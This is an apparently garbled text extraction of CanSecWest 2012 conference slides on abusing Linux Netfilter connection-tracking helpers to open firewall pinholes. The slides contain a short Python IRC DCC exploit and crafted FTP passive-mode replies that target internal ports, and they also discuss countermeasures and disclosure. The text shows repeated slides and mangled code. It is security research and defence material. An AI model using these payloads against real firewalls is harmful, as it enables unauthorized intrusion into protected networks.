Conntrack Attack
Conntrack Attack
filtering policy
ric Leblond
OISF
Cansecwest 2012
1 / 44
French
Network security expert
Free Software enthousiast
NuFW project creator (Now ufwi), EdenWall co-founder
Netfilter developer:
Ulogd2: Netfilter logging daemon
Misc contributions:
NFQUEUE library and associates
Source NAT randomisation (defeat Kaminskys DNS attack)
Currently:
Independant security consultant
Suricata IDS/IPS funded developer
2 / 44
Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
Attack description
Conditions and principles
FTP case
Others protocols
Conclusion
3 / 44
Netilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.
4 / 44
Netilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.
Features
Stateful and stateless packet filtering (IPv4 and IPv6).
Network address and port translation.
Multiple layers of APIs for 3rd party extensions.
4 / 44
Netilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.
Features
Stateful and stateless packet filtering (IPv4 and IPv6).
Network address and port translation.
Multiple layers of APIs for 3rd party extensions.
Iptables
Command line utility to do operation on rules.
It has access to all Netfilter features.
Two utilities: iptables for IPv4, ip6tables for IPv6.
i p t a b l e s A FORWARD p t c p syn d p o r t 80 \
m c o n n l i m i t c o n n l i m i t above 2 j REJECT
ric Leblond (OISF)
4 / 44
5 / 44
6 / 44
6 / 44
Tcpdump
Logged i n t o f t p . l i p 6 . f r .
ncftp / > ls
etc /
jussieu /
lip6 /
7 / 44
Tcpdump
Logged i n t o f t p . l i p 6 . f r .
ncftp / > ls
etc /
jussieu /
lip6 /
Protocol
C:
S:
C:
S:
S:
C:
PASV
227 Entering Passive Mode (195,83,118,1,199,211)
MLSD
150 Opening ASCII mode data connection for MLSD.
226 MLSD complete.
QUIT
7 / 44
Tcpdump
Logged i n t o f t p . l i p 6 . f r .
ncftp / > ls
etc /
jussieu /
lip6 /
Protocol
C:
S:
C:
S:
S:
C:
PASV
227 Entering Passive Mode (195,83,118,1,199,211)
MLSD
150 Opening ASCII mode data connection for MLSD.
226 MLSD complete.
QUIT
Netfilter
# c o n n t r a c k E expect
[NEW] 300 p r o t o =6 s r c =10.62.101.203 d s t =195.83.118.1 s p o r t =0 d p o r t =51155
[DESTROY] 300 p r o t o =6 s r c =10.62.101.203 d s t =195.83.118.1 s p o r t =0 d p o r t =51155
ric Leblond (OISF)
7 / 44
8 / 44
pptp
proto_gre
proto_udplite
sip
broadcast
h323
ipv6
netbios_ns
proto_dccp
proto_sctp
sane
snmp
8 / 44
Expectations in Netfilter
The expectation table
Expectations are stored in a specific table.
It is similar to the conntrack table.
Only one tuple is used.
A short timeout is added.
9 / 44
Expectations in Netfilter
The expectation table
Expectations are stored in a specific table.
It is similar to the conntrack table.
Only one tuple is used.
A short timeout is added.
9 / 44
Do I use helpers?
What happens if I load a helper?
10 / 44
Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
10 / 44
Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
Do helpers transform my firewall in openbar?
10 / 44
Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
Do helpers transform my firewall in openbar?
10 / 44
Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the
firewall?
Do helpers transform my firewall in openbar?
A study is needed.
Lets look at the helpers.
ric Leblond (OISF)
10 / 44
Source
Fixed
Full
Fixed
Full
Fixed
Full
Destination
In CMD
In CMD
Fixed
Fixed
Fixed
In CMD
Port Dest
In CMD
In CMD
In CMD
In CMD
In CMD
In CMD
Option
loose = 1 (dflt)
loose = 0
sip_direct_signalling = 1 (dflt)
sip_direct_signalling = 0
Legend:
Fixed: Value comes from the signalling connection. It cant be
forged.
In CMD: The value comes from protocol message parsing and can
be forged.
Full: Freedom is total. All values are accepted.
11 / 44
Global analysis
Sane defaults
Dangerous extensions of protocols have been disabled.
If we study the attack of client on a server:
It is impossible to open arbitrary connections to the server.
The level of security is acceptable.
12 / 44
Global analysis
Sane defaults
Dangerous extensions of protocols have been disabled.
If we study the attack of client on a server:
It is impossible to open arbitrary connections to the server.
The level of security is acceptable.
12 / 44
FTP analysis
13 / 44
FTP analysis
13 / 44
IRC analysis
The DCC command
DCC command enables transfer between end-point.
It is impossible to know the source address.
Destination port is fixed by the client.
14 / 44
IRC analysis
The DCC command
DCC command enables transfer between end-point.
It is impossible to know the source address.
Destination port is fixed by the client.
Consequences
Allowing DCC is thus allowing client to enable arbitrary connection
to his IP.
Client computer is given a complete freedom of connection
opening.
14 / 44
IRC analysis
The DCC command
DCC command enables transfer between end-point.
It is impossible to know the source address.
Destination port is fixed by the client.
Consequences
Allowing DCC is thus allowing client to enable arbitrary connection
to his IP.
Client computer is given a complete freedom of connection
opening.
A mistake is simply another way of doing things.
(Katharine Graham)
14 / 44
15 / 44
15 / 44
15 / 44
Exploit code
import socket
d e f ipnumber ( i p ) :
ip=ip . r s t r i p ( ) . s p l i t ( . )
i p n =0
while ip :
i p n =( ipn < <8)+ i n t ( i p . pop ( 0 ) )
return ipn
h o s t = " i r c . freenode . n e t "
d p o r t =6667 # IRC p o r t
s = s o c k e t . s o c k e t ( s o c k e t . AF_INET , s o c k e t .SOCK_STREAM)
s . connect ( ( host , d p o r t ) )
i p = " 1 9 2 . 1 6 8 . 1 . 1 2 9 " # L o c a l address o f c l i e n t
p o r t =6000 # P o r t t o open on I n t e r n e t
atmsg = PRIVMSG opensvp : \ x01DCC CHAT CHAT %d %d \ x01 \ r \ n \ \
% ( ipnumber ( i p ) , p o r t )
s . send ( atmsg )
s . close ( )
16 / 44
Video
ric Leblond (OISF)
17 / 44
Video
Lets connect from Internet to port 6000 of a NATed client.
ric Leblond (OISF)
17 / 44
18 / 44
18 / 44
More information
See http://home.regit.org/netfilter-en/secure-use-of-helpers/
ric Leblond (OISF)
18 / 44
Known attacks
Cisco Bug ID CSCdr09226
goal: Open pinhole in the firewall.
Force the server to generate a message interpreted as a
command by the firewall.
An error condition can be used to trigger the abnormal behaviour.
https://listserv.icsalabs.com/pipermail/firewall-wizards/2000-March/
008385.html
19 / 44
Known attacks
Cisco Bug ID CSCdr09226
goal: Open pinhole in the firewall.
Force the server to generate a message interpreted as a
command by the firewall.
An error condition can be used to trigger the abnormal behaviour.
https://listserv.icsalabs.com/pipermail/firewall-wizards/2000-March/
008385.html
19 / 44
Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
Attack description
Conditions and principles
FTP case
Others protocols
Conclusion
20 / 44
Objective
21 / 44
Objective
Our study of helpers has shown that it is not possible out of the
box:
Client capabilities are always limited.
Dangerous extensions have been blocked.
21 / 44
Objective
Our study of helpers has shown that it is not possible out of the
box:
Client capabilities are always limited.
Dangerous extensions have been blocked.
21 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Basic idea
22 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
Attack description
1
23 / 44
24 / 44
24 / 44
IPv4 case
To ask a client to connect to 192.168.2.2 on port 3306:
227 Entering Passive Mode (192,168,2,2,12,234)\r\n
24 / 44
IPv4 case
To ask a client to connect to 192.168.2.2 on port 3306:
227 Entering Passive Mode (192,168,2,2,12,234)\r\n
IPv6 case
To ask a client to connect on port 3306:
229 Extended Passive Mode OK (|||3306|)\r\n
ric Leblond (OISF)
24 / 44
25 / 44
25 / 44
25 / 44
25 / 44
25 / 44
25 / 44
Demonstration on Netfilter
Video
26 / 44
Demonstration on Netfilter
Video
Lets have firewall with a filtering policy allowing only port 21 and open
a connection to port 22 on a FTP server.
26 / 44
Policy violation
27 / 44
Policy violation
27 / 44
Policy violation
27 / 44
Policy violation
27 / 44
Counter-measures
28 / 44
Counter-measures
28 / 44
Counter-measures
28 / 44
Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
29 / 44
Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
Same technique applies with the following conditions:
Attacker and client are separated by firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by attacker (MITM or server).
29 / 44
Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
Same technique applies with the following conditions:
Attacker and client are separated by firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by attacker (MITM or server).
29 / 44
Others protocols
IRC
As discussed before IRC helper provide the client with great
power.
The issue is inverted: can we act against client?
Same technique applies with the following conditions:
Attacker and client are separated by firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by attacker (MITM or server).
SIP
The server sends port parameters in a similar way as FTP.
The same attack is possible.
Only the content has to be changed.
ric Leblond (OISF)
29 / 44
Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
Attack description
Conditions and principles
FTP case
Others protocols
Conclusion
30 / 44
31 / 44
31 / 44
31 / 44
31 / 44
Wait
31 / 44
31 / 44
31 / 44
31 / 44
32 / 44
32 / 44
32 / 44
32 / 44
32 / 44
32 / 44
33 / 44
33 / 44
Checkpoint setup
34 / 44
Checkpoint setup
34 / 44
Checkpoint setup
Used software
Demonstration version.
Minimal features installed.
34 / 44
Checkpoint setup
Used software
Demonstration version.
Minimal features installed.
Per default installation.
34 / 44
Demonstration setup
35 / 44
Demonstration setup
Lets do a filtering policy with a single FTP allowed rule ;
35 / 44
Demonstration setup
Lets do a filtering policy with a single FTP allowed rule ;
35 / 44
Demonstration
Video
36 / 44
Demonstration
Video
Lets have a firewall with a filtering policy allowing only port 21 and
open a connection to port 22 on a FTP server.
36 / 44
Policy violation
37 / 44
Policy violation
37 / 44
Policy violation
37 / 44
There is no problem
38 / 44
There is no problem
Basic requirement
Choose well you contractor: the security level depends on his skills.
38 / 44
Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
Attack description
Conditions and principles
FTP case
Others protocols
Conclusion
39 / 44
Other products
A generic attack
The attack may impact other firewall brands using ALGs.
Many of these firewalls remain untested:
Netfilter based firewall,
Iptables frontend,
Firewalls using ALG.
Testing
Easy to do with opensvp script.
Contact me if you are interested in using it.
40 / 44
41 / 44
42 / 44
42 / 44
Possible help
Contact CERT
If you get no response, send them a second e-mail.
Try to contact CERT Luxembourg, CERT Finland.
Microsoft Vulnerability Research (MSVR) is an alternative to CERT.
43 / 44
Questions
Do you have any questions?
Thanks to
Pablo Neira, Patrick McHardy: kernel developers can be friendly.
Sebastien Tricaud, Alexandre Dulaunoy: for their help and
because APT can be fun.
More information
My blog : http://home.regit.org
Secure use of Iptables and connection tracking helpers:
http://home.regit.org/netfilter-en/secure-use-of-helpers/
Contact me
E-mail: [email protected]
Twitter: @Regiteric
ric Leblond (OISF)
44 / 44